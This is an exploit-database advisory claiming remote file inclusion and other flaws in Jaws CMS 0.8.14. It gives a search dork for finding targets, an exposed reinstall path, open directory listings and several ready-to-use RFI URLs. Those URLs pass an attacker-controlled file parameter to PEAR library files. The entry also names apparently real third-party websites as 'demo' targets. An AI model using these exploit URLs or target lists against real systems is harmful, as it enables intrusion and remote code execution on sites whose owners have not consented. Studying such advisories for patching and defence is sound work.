Jaws 0.8.14 Remote File Inclusion

2011-10-09 / 2011-10-10

Credit: indoushka

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

================================
Jaws 0.8.14 Mullti Vulnerability 
================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=0
0    .    .--.   .--.   .---.      .                  1
1  .'|        )      )      /      |                  0
0    |     --:    --:      /    .-.| .-.  .  .        1
1    |        )      )    /    (   |(   ) |  |        0
0  '---'  `--'   `--'    '      `-'`-`-'`-`--|        1
1                                            ;        0
0     Site            : 1337day.com        `-'        1
1     Support e-mail  : submit[at]inj3ct0r.com        0
0     >> Exploit database separated by exploit        1 
1           type (local, remote, DoS, etc.)           0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=1

#######################################################

           # Vendor: http://www.jaws-project.com/

                 # Date: 2011-07-27 

                # Author : indoushka 

            +++=[ Dz Offenders Cr3w ]=+++

         # KedAns-Dz * Caddy-Dz * Kalashinkov3
 
      # Jago-dz * Kha&miX * T0xic * Ev!LsCr!pT_Dz 

           # Contact : ind0ushka@hotmail.com

     # Tested on : win SP2 + SP3 Fr / Back | Track 5 fr

########################################################################  
                                                                                                                                                                                                
# Exploit By indoushka 
-------------

Dork :Powered by the Jaws Project

Reinstall Script :

http://localhost/jaws/install/

Directory listing found Vulnerability

http://localhost/jaws/data/
http://localhost/jaws/data/Users/
http://localhost/jaws/gadgts/Phoo/
http://localhost/install/stages/

RFI :
Function: include_once		File: MDB2.php          	Line: 12
Exploit: http://localhost/jaws/libraries/pear/MDB2.php?file_name=[EV!L]

##################################################

Function: include_once		File: MDB2.php          	Line: 20
Exploit: http://localhost/jaws/libraries/pear/MDB2.php?file_name=[EV!L]

##################################################

Function: include_once		File: Weather.php          	Line: 7
Exploit: http://localhost/jaws/libraries/pear/Services/Weather.php?service=[EV!L]

##################################################

Function: include_once		File: Transport.php          	Line: 4
Exploit: http://localhost/jaws/libraries/pear/SOAP/Transport.php?transport_include=[EV!L]

##################################################

Function: require_once		File: MathLoader.php          	Line: 5
Exploit: http://localhost/jaws/libraries/pear/Crypt/RSA/MathLoader.php?class_filename=[EV!L]

Demo :

http://www.sendmassage.com/data/

http://www.jaws-project.com/install/

http://www.gusse.no/install/

Dz-Ghost Team ===== Saoucha * Star08 * Cyber Sec * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ===========================
special thanks to : r0073r (inj3ct0r.com) * L0rd CruSad3r * MaYur * MA1201 * KeDar * Sonic * gunslinger_ * SeeMe * RoadKiller 
Sid3^effects * aKa HaRi * His0k4 * Hussin-X * Rafik * Yashar * SoldierOfAllah * RiskY.HaCK * Stake * r1z * D4NB4R * www.alkrsan.net 
MR.SoOoFe * ThE g0bL!N * AnGeL25dZ * ViRuS_Ra3cH * Sn!pEr.S!Te 
---------------------------------------------------------------------------------------------------------------------------------

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Jaws 0.8.14 Remote File Inclusion

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.